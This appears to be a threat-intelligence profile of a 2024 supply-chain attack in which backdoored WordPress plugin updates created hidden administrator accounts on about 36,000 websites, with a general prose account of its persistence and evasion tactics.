Backdoored Wordpress Plugins | |
Type of Malware | Backdoor |
Date of Initial Activity | 2024 |
Motivation | Financial Gain |
Attack Vectors | Supply Chain |
Overview
The recent attack on WordPress plugins demonstrates the increasing sophistication of supply-chain attacks, particularly those targeting widely used content management systems (CMS). In this specific incident, attackers managed to backdoor multiple WordPress plugins, affecting approximately 36,000 websites globally. By embedding malicious code within legitimate plugin updates, the attackers were able to create hidden administrative accounts on the affected websites. These accounts provided them with unrestricted access, allowing them to steal sensitive data, execute arbitrary code, and even take full control of the compromised sites.
The technical execution of this attack is a textbook example of how cybercriminals can exploit the trust users place in well-known software plugins. When users installed or updated these compromised plugins, the malicious code was automatically injected into their WordPress sites. This code typically included functions that created new admin accounts or altered existing ones, often without the website owner’s knowledge. Once an admin account was established, the attackers could access the website’s backend, install additional malware, modify content, and exfiltrate data.
Targets
Information
How they operate
At the core of this attack is the injection of malicious code into the plugin’s source files. When a user updates or installs one of the compromised plugins, the code executes automatically within the WordPress environment. The malicious code is typically designed to perform several key actions. First, it creates a hidden administrative account within the WordPress system. This account often has a non-standard username and a randomized password, making it difficult for site administrators to detect through routine monitoring. The account is granted full administrative privileges, giving attackers complete control over the website.
Once the administrative account is established, the attackers can leverage it to further compromise the site. They can access the WordPress dashboard, modify or delete content, install additional malware, and exfiltrate sensitive data. In some cases, the backdoor also includes functions to communicate with a command-and-control (C2) server, allowing the attackers to issue remote commands or update the malicious payload. This capability enables the attackers to maintain persistence on the compromised site, even if the initial infection vector is discovered and removed.
Another key aspect of these backdoored plugins is their ability to evade detection. The malicious code is often obfuscated or hidden within legitimate-looking code blocks, making it difficult for automated security scanners or even human reviewers to identify. Additionally, because the code is executed as part of the normal plugin functionality, it blends in with legitimate operations, further reducing the likelihood of detection. This stealthy approach allows the attackers to maintain access to compromised websites for extended periods, often until the site administrators notice unusual behavior or a security audit is conducted.
